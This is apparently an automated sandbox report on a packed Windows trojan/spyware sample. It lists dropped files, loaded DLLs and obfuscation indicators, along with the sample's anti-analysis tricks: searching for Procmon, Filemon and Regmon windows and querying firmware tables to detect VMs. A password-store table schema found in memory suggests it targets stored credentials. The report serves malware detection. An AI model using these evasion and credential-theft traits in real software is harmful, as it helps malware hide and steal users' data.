Source: file.exe, 00000000.00000003.2233949392.0000000006241000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2218720755.0000000006237000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2247951472.00000000064A0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2227764552.0000000006238000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2226303572.0000000006313000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2233546782.0000000006333000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217588128.000000000623B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2228075555.0000000006318000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2221012388.0000000006232000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235648092.0000000006346000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223193509.0000000006238000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2245796475.0000000006233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2219660967.0000000006234000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222101490.00000000062F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217284795.0000000006095000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2227235680.0000000006320000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253655039.00000000017FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2218976787.0000000006239000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253012339.0000000005EB2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2219771223.00000000062D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253882132.000000000677F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248276802.0000000006362000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2229685780.000000000631A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2226766339.0000000006234000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2237021186.0000000006353000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222554909.00000000062F8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2225804448.0000000006238000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2247542612.0000000006232000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223777815.00000000063E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2230678876.0000000006331000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2249117875.0000000006373000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248745513.0000000006372000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2228816035.0000000006238000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220206879.0000000006236000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2247779293.0000000006363000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248610827.0000000006238000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2241782988.000000000635D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2216521225.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2218854474.00000000062D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2232378040.0000000006239000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2246341402.0000000006473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2216099204.0000000005EB2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2225491096.00000000063DC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2249299548.0000000006233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234595414.000000000633E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2250268349.0000000006233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2219984823.0000000006238000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2246002360.0000000006353000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2216521225.0000000006013000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2237982528.000000000635D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2238204909.000000000623E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2218498494.000000000636C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2249856064.00000000064C4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2221813854.000000000639A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235125286.0000000006440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2229030250.000000000631A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253187496.0000000005E28000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222398283.0000000006237000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2245417815.000000000623D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2221965348.0000000006233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217485404.000000000609D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248457109.00000000064A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2246558017.000000000623A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235829581.0000000006236000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253479520.0000000005DD4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2219088818.00000000062E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253538805.00000000017E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2246989087.0000000006370000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2237583921.000000000623B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234383466.000000000623E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248925777.0000000006232000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2245130561.000000000647E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220291424.00000000062EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2230324132.0000000006237000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2240106789.0000000006236000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217387489.0000000006232000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2231440713.000000000632C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9981264694357367
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/2@2/2
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\02FQBW3AYVFKS8DMY3O.exe.log Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Mutant created: NULL
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000003.2097251680.0000000005E42000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005D98000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 36%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe String found in binary or memory: zRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNe
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe "C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe "C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: sspicli.dll Jump to behavior
Source: file.exe Static file information: File size 3000320 > 1048576
Source: file.exe Static PE information: Raw size of wbrzvzgu is bigger than: 0x100000 < 0x2b1200
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 02FQBW3AYVFKS8DMY3O.exe, 00000003.00000003.2276067053.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, 02FQBW3AYVFKS8DMY3O.exe, 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.820000.0.unpack :EW;.rsrc :W;.idata :W;wbrzvzgu:EW;gwyfrlto:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;wbrzvzgu:EW;gwyfrlto:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Unpacked PE file: 3.2.02FQBW3AYVFKS8DMY3O.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W;lckjivxs:EW;pqfzdyos:EW;.taggant:EW; vs :ER;.rsrc:W;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x2ea059 should be: 0x2e7f27
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: real checksum: 0x2a263f should be: 0x2a418d
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: wbrzvzgu
Source: file.exe Static PE information: section name: gwyfrlto
Source: file.exe Static PE information: section name: .taggant
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: section name:
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: section name: .idata
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: section name: lckjivxs
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: section name: pqfzdyos
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: file.exe Static PE information: section name: entropy: 7.982977832144119
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: section name: entropy: 7.778035325115451
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes / dynamic malware analysis system (registry check)
